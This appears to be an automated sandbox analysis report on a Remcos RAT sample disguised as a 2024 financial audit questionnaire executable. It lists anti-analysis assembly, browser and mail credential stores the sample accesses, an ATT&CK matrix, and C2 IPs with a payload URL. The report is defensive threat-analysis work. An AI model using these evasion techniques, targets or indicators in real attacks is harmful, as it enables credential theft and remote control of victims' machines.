              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI/Special instruction interceptor: Address: 55A504D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI/Special instruction interceptor: Address: 226504D
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeRDTSC instruction interceptor: First address: 5544CA7 second address: 5544CA7 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F72D0C8BBFCh 0x00000008 cmp ah, dh 0x0000000a cmp eax, 2C2347D7h 0x0000000f inc ebp 0x00000010 test bl, bl 0x00000012 inc ebx 0x00000013 cmp cx, bx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeRDTSC instruction interceptor: First address: 2204CA7 second address: 2204CA7 instructions: 0x00000000 rdtsc 0x00000002 cmp bl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F72D1100B9Ch 0x00000008 cmp ah, dh 0x0000000a cmp eax, 2C2347D7h 0x0000000f inc ebp 0x00000010 test bl, bl 0x00000012 inc ebx 0x00000013 cmp cx, bx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeWindow / User API: threadDelayed 515Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeWindow / User API: threadDelayed 9050Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeWindow / User API: foregroundWindowGot 1767Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI coverage: 4.3 %
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI coverage: 9.9 %
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 1016Thread sleep count: 180 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 1016Thread sleep time: -90000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 7356Thread sleep count: 515 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 7356Thread sleep time: -1545000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 7356Thread sleep count: 9050 > 30Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe TID: 7356Thread sleep time: -27150000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405814
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_004062CF FindFirstFileW,FindClose,0_2_004062CF
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_00402770 FindFirstFileW,9_2_00402770
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_00405814 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_00405814
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_004062CF FindFirstFileW,FindClose,9_2_004062CF
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_335610F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_335610F1
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33566580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,9_2_33566580
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040AE51 FindFirstFileW,FindNextFileW,12_2_0040AE51
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,13_2_00407EF8
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,14_2_00407898
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_00418981 memset,GetSystemInfo,12_2_00418981
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.0000000002578000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: bhv8781.tmp.12.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-4798
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI call chain: ExitProcess graph end nodegraph_0-4799
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeAPI call chain: ExitProcess graph end nodegraph_13-34121
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,0_2_00401752
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_33562639
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33564AB4 mov eax, dword ptr fs:[00000030h]9_2_33564AB4
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_3356724E GetProcessHeap,9_2_3356724E
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_33562B1C
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_33562639
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_335660E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_335660E2

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: NULL target: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: NULL target: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeSection loaded: NULL target: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\kcthojq"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\mfyzpcbefou"Jump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeProcess created: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe "C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe" /stext "C:\Users\user\AppData\Local\Temp\xzlsqumgtwmcyb"Jump to behavior
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\*
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\H
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\A
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\7p
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerw
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\cf
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\l
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager}
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\-
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager21\1
              Source: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe, 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562933 cpuid 9_2_33562933
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 9_2_33562264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_33562264
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 13_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,13_2_004082CD
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: 0_2_00405FAE GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405FAE
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2936, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: ESMTPPassword13_2_004033F0
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword13_2_00402DB3
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword13_2_00402DB3
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2936, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2616, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025CF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3426501953.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.3427771345.00000000025B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe PID: 2936, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              2
              Obfuscated Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol1
              Data from Local System
              2
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection
              1
              Software Packing
              2
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading
              1
              Credentials In Files
              228
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              1
              Remote Access Software
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading
              LSA Secrets231
              Security Software Discovery
              SSH2
              Clipboard Data
              2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input Capture112
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576235 Sample: Suzhou Alpine Flow Control ... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 27 geoplugin.net 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 10 other signatures 2->47 8 Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe 1 34 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\Local\...\System.dll, PE32 8->23 dropped 11 Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe 3 15 8->11         started        process6 dnsIp7 29 162.251.122.87, 2404, 49816, 49822 UNREAL-SERVERSUS Canada 11->29 31 geoplugin.net 178.237.33.50, 49824, 80 ATOM86-ASATOM86NL Netherlands 11->31 33 66.63.187.30, 49808, 80 ASN-QUADRANET-GLOBALUS United States 11->33 25 C:\ProgramData\remcos\logs.dat, data 11->25 dropped 49 Detected Remcos RAT 11->49 51 Maps a DLL or memory area into another process 11->51 53 Installs a global keyboard hook 11->53 16 Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe 1 11->16         started        19 Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe 1 11->19         started        21 Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe 2 11->21         started        file8 signatures9 process10 signatures11 35 Tries to steal Instant Messenger accounts or passwords 16->35 37 Tries to harvest and steal browser information (history, passwords, etc) 16->37 39 Tries to steal Mail credentials (via file / registry access) 19->39

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe18%ReversingLabsWin32.Trojan.Nekark
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nshE0D4.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binS0%Avira URL Cloudsafe
              http://www.skinstudio.netG0%Avira URL Cloudsafe
              http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.bin0%Avira URL Cloudsafe
              http://www.imvu.compData0%Avira URL Cloudsafe
              http://66.63.187.30/GrDfwEbxHEuyrsJcDgnTLZ14.binq0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
